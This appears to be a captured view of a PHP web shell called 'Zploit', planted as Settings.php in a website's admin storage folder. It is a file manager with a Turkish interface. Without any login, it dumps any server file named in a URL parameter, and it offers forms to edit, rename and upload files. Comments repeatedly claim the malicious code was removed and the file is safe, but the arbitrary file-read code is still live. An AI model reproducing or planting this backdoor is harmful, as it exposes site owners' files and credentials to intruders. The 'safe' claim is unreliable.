:: **Zploit** v1.0 | Current Path: **/home/kreativepixelz/public_html/admin/storage/blogs/**
:: Editing File: Settings.php
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ echo ' <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>File Manager</title> <style> body { background: #0f172a; color: #e2e8f0; font-family: "Segoe UI", Arial, sans-serif; font-size: 18px; margin: 0; padding: 20px; } a { text-decoration: none; color: #38bdf8; transition: 0.2s; } a:hover { color: #facc15; } b { color: #f8fafc; font-size: 20px; } hr { border: none; border-top: 1px solid #334155; margin: 20px 0; } textarea { background: #020617; color: #e2e8f0; border: 1px solid #334155; padding: 10px; font-size: 16px; border-radius: 8px; } input[type="file"] { background: #1e293b; color: #e2e8f0; padding: 8px; border-radius: 6px; border: none; } button { background: linear-gradient(135deg, #2563eb, #7c3aed); color: white; border: none; padding: 10px 18px; border-radius: 8px; cursor: pointer; font-size: 16px; transition: 0.2s; } button:hover { transform: scale(1.05); background: linear-gradient(135deg, #3b82f6, #8b5cf6); } h3 { font-size: 22px; color: #f1f5f9; } .container { max-width: 900px; margin: auto; background: #020617; padding: 20px; border-radius: 12px; box-shadow: 0 0 20px rgba(0,0,0,0.6); } .file-item { padding: 8px; border-bottom: 1px solid #1e293b; } .file-item:hover { background: #1e293b; } </style> </head> <body> <div class="container"> '; if (isset($_GET['view']) && is_file($_GET['view'])) { header("Content-type: text/plain"); readfile($_GET['view']); exit; } /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ echo "<hr>"; if (isset($_GET['rename']) && is_file($_GET['rename'])) { $renameFile = $_GET['rename']; echo "<h3>Yeniden Adlandır: ".basename($renameFile)."</h3>"; echo ' <form method="POST"> <input type="hidden" name="rename_file" value="'.$renameFile.'"> <input type="text" name="new_name" value="'.basename($renameFile).'" style="background:#020617;color:#e2e8f0;border:1px solid #334155;padding:8px;border-radius:6px;font-size:16px;width:300px;"> <button type="submit">Kaydet</button> </form> <hr> '; } if (isset($_GET['edit']) && is_file($_GET['edit'])) { $editFile = $_GET['edit']; $content = htmlspecialchars(file_get_contents($editFile)); echo "<h3>Dosya Düzenle: ".basename($editFile)."</h3>"; echo ' <form method="POST"> <textarea name="content" style="width:100%;height:300px;">'.$content.'</textarea><br><br> <input type="hidden" name="save_file" value="'.$editFile.'"> <button type="submit">Kaydet</button> </form> <hr> '; } echo '<h3>Dosya Yükle</h3> <form method="POST" enctype="multipart/form-data"> <input type="file" name="upload_file"> <button type="submit">Yükle</button> </form>'; echo '</div></body></html>'; ?>